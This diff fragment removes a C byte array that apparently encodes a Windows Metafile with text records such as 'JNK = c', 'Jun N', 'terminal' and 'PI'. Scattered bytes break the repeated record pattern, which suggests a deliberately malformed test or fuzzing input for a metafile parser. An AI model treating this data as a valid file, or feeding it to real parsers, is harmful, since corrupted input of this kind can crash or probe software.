-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00,
-	0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83,
-	0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
-	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02,
-	0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00,
-	0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
-	0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
-	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
-	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00,
-	0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00,
-	0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0xEF, 0x00,
-	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00,
-	0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00,
-	0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
-	0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00,
-	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00,
-	0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
-	0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00,
-	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x20, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x04, 0x00,
-	0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00,
-	0x09, 0x00, 0x09, 0x00, 0x06, 0x00, 0xB8, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x2A, 0x00, 0x07, 0x00, 0x00, 0x00, 0x4A, 0x4E,
-	0x4B, 0x20, 0x3D, 0x20, 0x63, 0x00, 0x0A, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0A, 0x00,
-	0x05, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
-	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02,
-	0x6D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x72, 0x00, 0x05, 0x00, 0x00, 0x00, 0x4A, 0x75, 0x6E, 0x20,
-	0x4E, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x95, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE8, 0x00,
-	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x7C, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA9, 0x00,
-	0x08, 0x00, 0x00, 0x00, 0x74, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x06, 0x00, 0x09, 0x00,
-	0x08, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0xBA, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0x07, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xF1, 0x00, 0x06, 0x00, 0x00, 0x00, 0x6B, 0x69,
-	0x74, 0x61, 0x73, 0x65, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x81, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0x2A, 0x00, 0x06, 0xEF,
-	0x00, 0x00, 0x4D, 0x41, 0x50, 0x4B, 0x20, 0x3D, 0x12, 0x00, 0x0D, 0x00, 0x0C, 0x00, 0x0E, 0x00,
-	0x05, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
-	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02,
-	0x78, 0x00, 0x07, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0F, 0x00,
-	0x05, 0x00, 0x06, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
-	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xBE, 0x00,
-	0x11, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x09, 0x00, 0x24, 0x00, 0x06, 0x00, 0x05, 0x00, 0x09, 0x00,
-	0x0A, 0x00, 0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
-	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x3C, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x7E, 0x00, 0x00,
-	0x32, 0x0A, 0x61, 0x02, 0x49, 0x01, 0x06, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
-	0x0B, 0x00, 0x05, 0x00, 0x0A, 0x7E, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2D, 0x01, 0x01, 0x00, 0x07, 0x00, 0x00, 0x00, 0x1B, 0x04, 0x84, 0x02, 0x92, 0x03, 0x28, 0x00,
-	0xC8, 0x01, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01,
-	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xEB, 0xFF, 0x00, 0x00,
-	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
-	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC1, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0xD2, 0x01, 0x0E, 0x00,
-	0x00, 0x00, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x71, 0x2F, 0x71, 0x71, 0x71,
-	0x13, 0x00, 0x0E, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0D, 0x00, 0x06, 0x00, 0x13, 0x00, 0x0F, 0x00,
-	0x0E, 0x00, 0x11, 0x00, 0x06, 0x00, 0x0E, 0x00, 0x0F, 0x00, 0x11, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x1F, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0xD0,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0x96, 0x02, 0x06, 0x00, 0x00, 0x00, 0x71, 0x71,
-	0x71, 0x71, 0x71, 0x71, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x16, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0xD2, 0x01, 0x0A, 0x00,
-	0xD0, 0x00, 0x71, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x13, 0x00, 0x0E, 0x00,
-	0x11, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x14, 0x00, 0x0E, 0x00, 0x11, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x7C, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x0A, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0x65, 0x02, 0x06, 0x00,
-	0x00, 0x00, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00,
-	0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0x2E, 0x02, 0x05, 0x00,
-	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x75, 0x00,
-	0xD2, 0x01, 0x24, 0x00, 0x00, 0x00, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71,
-	0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71,
-	0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x20, 0x42, 0x20, 0x0F, 0x00, 0x0E, 0x00, 0x05, 0x00,
-	0x0B, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0F, 0x00, 0x05, 0x00,
-	0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00,
-	0x08, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0C, 0xD4, 0x08, 0x00,
-	0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0F, 0x00,
-	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x8F, 0x00, 0xD2, 0x01,
-	0x17, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
-	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0F, 0x00,
-	0x10, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00,
-	0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0F, 0x00, 0x08, 0x00,
-	0x0C, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00,
-	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x82, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0xF4, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xD2, 0x01,
-	0x02, 0x00, 0x00, 0x00, 0x50, 0x49, 0x0E, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0xE5, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF3, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x35, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xE7, 0x01, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x1D, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xEE, 0x01, 0x01, 0x00,
-	0x00, 0x00, 0x33, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
-	0x05, 0x43, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A,
